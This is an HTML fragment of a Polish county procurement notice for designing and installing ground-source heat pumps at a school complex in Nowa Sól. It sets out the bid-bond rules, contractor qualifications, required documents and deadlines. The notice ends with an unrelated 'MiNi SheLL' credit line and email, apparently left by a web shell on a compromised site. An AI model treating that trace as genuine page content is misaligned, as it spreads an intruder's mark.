5.Wykonawca również na koszt własny wykona wszelkie niezbędne badania, analizy, mapy niezbędne
do prawidłowej realizacji zlecenia.
6.Zamawiający wymaga, aby w ramach niniejszego zamówienia zaprojektować i wykonać instalacje
pomp ciepła dobrane do potrzeb ogrzewania i produkcji ciepłej wody użytkowej. Zaprojektowane i
wykonane instalacje pomp ciepła muszą zapewnić moc cieplną na potrzeby c.o. i c.w.u. Brakującą
moc cieplną zapewni istniejąca kotłownia centralna opalana gazem (piec gazowy BUDERUS 400
kW).
7.Zakres zamówienia obejmuje:
a.uzyskanie wszelkich warunków, opinii, pozwoleń i uzgodnień, badań, w zakresie niezbędnym do
opracowania pełnej dokumentacji projektowej zgodnie z załączonymi analizami techniczno
ekonomicznymi zmiany źródła ciepła,
b.opracowanie projektu budowlanego zatwierdzonego przez zamawiającego zgodnie z
załączonymi analizami techniczno ekonomicznymi zmiany źródła ciepła i uzyskanie pozwolenia
na budowę,
c.opracowanie i uzgodnienie z inwestorem projektów wykonawczych,
d.wykonanie na podstawie opracowanej dokumentacji robót budowlanych i instalacyjnych,
e.uzyskanie pozwolenia na użytkowanie i wykonanie dokumentacji powykonawczej. Oferta
dostarczona przez oferentów musi obejmować cały zakres prac niezbędnych do przygotowania
inwestycji i jej wykonania oraz obioru robót instalacyjnych, montażowych wraz z
uruchomieniem instalacji. Wykonawca zobowiązuje się do wykonania całego zakresu
zamówienia i poniesienia wszelkich kosztów z tym związanych,
Aktualne uwarunkowania wykonania przedmiotu zamówienia:
a.Obiekty ZSP nr 2 położone są na działce o numerze ewidencyjnym 148/3, obręb 4 Nowa Sól,
jednostka ewidencyjna Nowa Sól w powiecie nowosolskim, województwo lubuskie.
b.Wjazd drogowy na działkę zarówno w okresie budowy jak również funkcjonowania obiektu
możliwy jest przez istniejąca bramę wjazdową..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 71.00.00.00-8, 45.23.11.12-3, 45.23.24.60-4, 45.30.00.00-0, 45.33.00.00-9, 45.31.00.00-6, 45.33.11.00-7, 45.10.00.00-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.10.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1) Zamawiający żąda od Wykonawców wniesienie wadium przetargowego 12.000,00 PLN (słownie:
dwanaście tysięcy złotych), które winno być wniesione przed upływem terminu składania ofert.
2) Wadium może być wniesione w jednej lub w kilku następujących formach:
a) pieniądzu,
b) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo- kredytowej, z
tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
c) gwarancjach bankowych,
d) gwarancjach ubezpieczeniowych,
e) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust.5 pkt 2 ustawy z 9
listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz.U. z 2007r. nr
42,poz.275, z 2008 r. nr 116, poz.730 i 732 i nr 227, poz.1505 oraz z 2010r. nr 96, poz.620)
Uwaga:
W przypadku składania przez Wykonawcę wadium w formie gwarancji, powinna być ona sporządzona
zgodnie z obowiązującym prawem i powinna zawierać następujące elementy:
a) nazwa dającego zlecenie udzielenia gwarancji (wykonawcy), beneficjenta gwarancji
(zamawiającego), gwaranta (banku lub instytucji ubezpieczeniowej udzielających gwarancji) oraz
wskazania ich siedzib;
b) określenie wierzytelności, która ma być zabezpieczona gwarancją;
c) kwotę gwarancji;
d) termin ważności gwarancji;
e) zobowiązanie gwaranta do zapłacenia kwoty gwarancji na pierwsze pisemne żądanie
Zamawiającego w przypadkach określonych w art.46 ust.4a i 5 ustawy Pzp i być bezwarunkowe,
nieodwołalne i płatne na pierwsze pisemne żądanie Zamawiającego.
f) wymagana ważność wadium w formach innych niż pieniężna minimum 30 dni od daty składania
ofert.
3) Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy Zamawiającego
BGŻ o/Nowa Sól nr 89 2030 0045 1110 0000 0028 4750 z dopiskiem :przetarg -
termomodernizacja ZSP nr 2 w Nowej Soli - pompy ciepła .
4) W przypadku wnoszenia wadium w formie pieniężnej do oferty należy załączyć kopię przelewu
wadium na rachunek bankowy Zamawiającego potwierdzoną za zgodność z oryginałem przez
Wykonawcę.
5) Wniesienie wadium w innej, niż wskazanej w pkt 2) formie będzie skutkować uznaniem iż oferta
Wykonawcy nie jest właściwie zabezpieczona wadium, a Zamawiający będzie musiał wykluczyć
takiego Wykonawcę z postępowania na podstawie art. 24 ust.2 pkt 2 ustawy pzp.
6) Wadium wniesione w pieniądzu Zamawiający przechowuje na rachunku bankowym, które zwraca
wraz z odsetkami wynikającymi z umowy rachunku bankowego, na którym było on
przechowywane, pomniejszone o koszty prowadzenia rachunku bankowego oraz prowizji bankowe,
za przelew pieniędzy na rachunek bankowy wskazany przez wykonawcę.
7) Termin wniesienia wadium w formie gotówki :
a) za termin wniesienia wadium uznaje się datę wpływu na rachunek Zamawiającego;
b) wadium pieniężne musi być zaksięgowane najpóźniej przed upływem terminu składania ofert,
dlatego Wykonawca musi uwzględnić czas, aby wymagana kwota zdążyła wpłynąć na konto
Zamawiającego (została zaksięgowana w banku na rzecz Zamawiającego).
8) W przypadku wniesienia przez Wykonawcę wadium w formie określonej w pkt.2.b) do pkt 2.e)
zobowiązany jest on załączyć oryginał właściwego dokumentu poręczenia lub gwarancji do złożonej
oferty.
9) Zgodnie z art. 24 ust. 2 pkt 2) Wykonawcę, który nie wniósł wadium w wyznaczonym terminie
wyklucza się z postępowania.
10) Zamawiający żąda ponownego wniesienia wadium przez Wykonawcę, któremu zwrócono wadium
na podstawie art.46 ust.1 ustawy Pzp, jeżeli w wyniku rozstrzygnięcia odwołania jego oferta została
wybrana jako najkorzystniejsza. Wykonawca wnosi wadium w terminie określonym przez
Zamawiającego.
11) Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca w odpowiedzi na wezwanie,
którym mowa w art. 26 ust. 3 ustawy pzp, nie złożył dokumentów lub oświadczeń, o których mowa
w art. 25 ust. 1 ustawy pzp, lub pełnomocnictw, chyba że udowodni, że wynika to z przyczyn nie
leżących po jego stronie;
12) Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca , którego oferta została
wybrana:
a) odmówił podpisania umowy na warunkach określonych w ofercie;
b) nie wniósł wymaganego zabezpieczenia należytego wykonania umowy;
c) zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących
po stronie Wykonawcy.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od opisu sposobu dokonywania oceny spełnienia warunków w tym zakresie.
Zamawiający dokona oceny spełnienia warunków udziału w postępowaniu w tym zakresie na
podstawie złożonego oświadczenia o spełnieniu warunków udziału w postępowaniu</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Opis sposobu dokonywania oceny spełniania tego warunku:
Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że wykonał w okresie ostatnich
5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w
tym okresie, co najmniej dwa zadania polegające na przebudowie istniejącego źródła ciepła z
zastosowaniem gruntowej pompy ciepła na obiektach użyteczności publicznej w tym, co najmniej
jedno zadanie polegające na montażu pojedynczej pompy ciepła o mocy nie mniejszej niż 180 kW
wraz z wykonaniem dolnego źródła ciepła w postaci odwiertów o głębokości nie mniejszej niż 160 m
o wartości łącznej nie mniejszej niż 700.000,00 zł brutto ,</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że dysponuje osobami zdolnymi do wykonania niniejszego zamówienia tj. co najmniej :
a)projektant w zakresie specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych - 1 osoba posiadająca uprawnienia bez ograniczeń do wykonywania prac projektowych w specjalności instalacyjnej (instalacje urządzeń elektrycznych i elektroenergetycznych). Minimum trzyletnie doświadczenie w wykonywaniu prac projektowych;
b)projektant w zakresie specjalności instalacyjnej w zakresie instalacji i urządzeń: cieplnych i gazowych - 1 osoba posiadająca uprawnienia bez ograniczeń do wykonywania prac projektowych w specjalności instalacji i urządzeń, cieplnych i gazowych. Minimum trzyletnie doświadczenie w
wykonywaniu prac projektowych;
c)kierownik budowy-1 osoba posiadająca ważne uprawnienia do wykonywania samodzielnych funkcjiw budownictwie w specjalności konstrukcyjno - budowlanej bez ograniczeń lub odpowiadające im
ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących
przepisów, upoważniające do kierowania robotami konstrukcyjno - budowlanymi. Minimum trzyletnie
doświadczenie zawodowe w pełnieniu funkcji kierownika budowy/lub kierownika robót/ lub
inspektora nadzoru.
d)kierownik robót branży elektrycznej - 1 osoba posiadająca ważne uprawnienia do wykonywania
samodzielnych funkcji w budownictwie w specjalności elektrycznej bez ograniczeń lub odpowiadające
im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących
przepisów. Minimum trzyletnie doświadczenie zawodowe w pełnieniu funkcji kierownika budowy / lub
kierownika robót / lub inspektora nadzoru.
e) kierownik robót branży sanitarnej - 1 osoba posiadająca ważne uprawnienia do wykonywania
samodzielnych funkcji w budownictwie w specjalności sanitarnej bez ograniczeń lub odpowiadające
im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących
przepisów. Minimum trzyletnie doświadczenie zawodowe w pełnieniu funkcji kierownika budowy/lub
kierownika robót/ lub inspektora nadzoru.
W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia ( Konsorcjum, Spółka
cywilna) powyższy warunek może być spełniony wspólnie przez członków Konsorcjum/ Wspólników
Spółki cywilnej.
UWAGA:
W/wosoba powinny posiadać aktualne zaświadczenie o przynależności do odpowiedniej izby
samorządu zawodowego
Zamawiający dopuszcza możliwość posiadania wszystkich w/w uprawnień przez jedną lub kilka
osób.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>warunek ten zostanie uznany za spełniony, jeżeli Wykonawca wykażę, że :
a) posiada środki finansowe lub zdolność kredytową w wysokości nie mniejszej niż 700.000,00 PLN</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">określenie robót budowlanych, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o robotach budowlanych niewykonanych lub wykonanych nienależycie<br>zadania polegające na przebudowie istniejącego źródła ciepła z
zastosowaniem gruntowej pompy ciepła na obiektach użyteczności publicznej w tym, co najmniej
jedno zadanie polegające na montażu pojedynczej pompy ciepła o mocy nie mniejszej niż 180 kW
wraz z wykonaniem dolnego źródła ciepła w postaci odwiertów o głębokości nie mniejszej niż 160 m
o wartości łącznej nie mniejszej niż 700.000,00 zł brutto ,;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową innego podmiotu, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1) wypełniony Formularz oferty - sporządzony wg wzoru załącznik nr 1 do SIWZ;
2) wypełniony Formularz cenowy - sporządzony wg wzoru nr 1A do SIWZ
3) oświadczenie Wykonawcy o spełnieniu warunków udziału określonych w art.22 ust.1 - sporządzony
wg wzoru załącznik nr 2 do SIWZ;
4) oświadczenie Wykonawcy o braku podstaw do wykluczenia na podstawie art.24 ust.1 i 2 -
sporządzony wg wzoru załącznik nr 3 do SIWZ;
5) informacja o przynależności do grupy kapitałowej - sporządzony wg wzoru załącznik nr 4 do SIWZ;
6) pełnomocnictwo do złożenia oferty - w przypadku, gdy prawo do podpisania oferty nie wynika z
przepisów prawa lub z dokumentów rejestrowych złożonych wraz z ofertą. Pełnomocnictwo należy
złożyć w oryginale lub notarialnie poświadczonej kopii;
7) dowód wniesienia wadium;
8) pozostałe oświadczenia i dokumenty, o których mowa w ust. 7 SIWZ.
Uwaga:
1. Oferta składana przez spółkę cywilną poza wyżej wymienionymi dokumentami winna dodatkowo
zawierać umowę spółki cywilnej - jeżeli oferta nie jest podpisywana przez wszystkich wspólników
tworzących spółkę.
2. Zamawiającemu przysługuje prawo do żądania przedstawienia oryginału dokumentu lub jego kopii
poświadczonej notarialnie w sytuacji, gdy złożona przez Wykonawcę kopia dokumentu jest
nieczytelna lub budzi wątpliwości co do jej autentyczności.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.Wszelkie zmiany i uzupełnienia umowy wymagają zachowania formy pisemnego pod rygorem
nieważności.
2.Zamawiający przewiduje możliwość zmiany umowy w następujących przypadkach:
1) zmiana terminu realizacji przedmiotu umowy wraz ze skutkami wprowadzenia takiej zmiany, przy
czym zmiana spowodowana może być jedynie okolicznościami leżącymi wyłącznie po stronie
Zamawiającego lub okolicznościami niezależnymi zarówno od Zamawiającego jak i od Wykonawcy;
2) rezygnacja przez Zamawiającego z realizacji części przedmiotu umowy. W takim przypadku
wynagrodzenie Wykonawcy zostanie pomniejszone i termin realizacji skrócony, przy czym Zamawiający zapłaci za wszystkie spełnione świadczenia oraz udokumentowane koszty, które
Wykonawca poniósł w związku z wynikającymi z umowy planowanymi świadczeniami,
3) zmiany sposobu realizacji przedmiotu umowy;
4) zastosowania innych rozwiązań technicznych, technologicznych, innych materiałów i urządzeń niż
przewidziane w dokumentacji pod warunkiem, że:
a) zamienne materiały i urządzenia będą miały lepsze parametry techniczne, bez pogorszenia
warunków eksploatacyjnych;
b) zmiany te spowodują obniżenie kosztów na eksploatację i konserwację wykonanego przedmiotu
umowy bez pogorszenia parametrów technicznych materiałów i urządzeń;
c) wynikać będą z konieczności usunięcia błędów w dokumentacji lub realizacji przedmiotu umowy
przy zastosowaniu innych rozwiązań technicznych, technologicznych lub materiałowych niż
przewidziane w dokumentacji ze względu na zmiany obowiązującego prawa;
d) przyjęte w dokumentacji materiały lub urządzenia są niedostępne na rynku, zostały wycofane z
produkcji.
5) w innych sytuacjach, których nie można było przewidzieć w chwili zawarcia umowy i mających
charakter zmian nieistotnych tj. nie odnoszących się do warunków, które gdyby zostały ujęte w
ramach pierwotnej procedury udzielenia zamówienia, umożliwiłyby dopuszczenie innej oferty niż ta,
która została pierwotnie dopuszczona;
6) gdy zmiany korzystne są dla Zamawiającego.
3. Pozostałe zmiany.
1) możliwość rozwiązania umowy bez zachowania okresu wypowiedzenia w przypadku wszczęcia
postępowania upadłościowego lub otwarcia likwidacji Wykonawcy,
2) zmiana sposobu rozliczania wynagrodzenia Wykonawcy lub dokonywanie płatności na rzecz
Wykonawcy na skutek zmian w zawartej przez Zamawiającego umowie o dofinansowanie projektu
lub zmian wytycznych dotyczących realizacji projektu,
4. Wszystkie powyższe postanowienia stanowią katalog zmian, na które Zamawiający może wyrazić
zgodę. Nie stanowią one jednak zobowiązania do wyrażenia takiej zgody.
5. Nie stanowi zmiany umowy w rozumieniu art. 144 ustawy Prawo zamówień publicznych:
1) zmiana danych związanych z obsługą administracyjno-organizacyjną umowy (np. zmiana nr
rachunku bankowego),
2) zmiany danych teleadresowych, zmiany osób wskazanych do kontaktów między stronami,
Pozostałe kwestie odnoszące się do umowy uregulowane są w załączniku nr 7 do SIWZ -
Formularzu istotnych postanowień umowy .</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.powiat-nowosolski.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe, 67-100 Nowa Sol , ul. Moniuszki 3b, pok.201.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 09.05.2014 godzina 09:00, miejsce: Powiat Nowosolski z siedzibą Starostwa Powiatowego,
Ul. Moniuszki 3b, 67-100 Nowa Sól,
Sekretariat - I piętro - pok.109.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt współfinansowany przez Unię Europejską ze środków Europejskiego Funduszu Rozwoju
Regionalnego w ramach Lubuskiego Regionalnego Programu Operacyjnego na lata 2007-2013..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com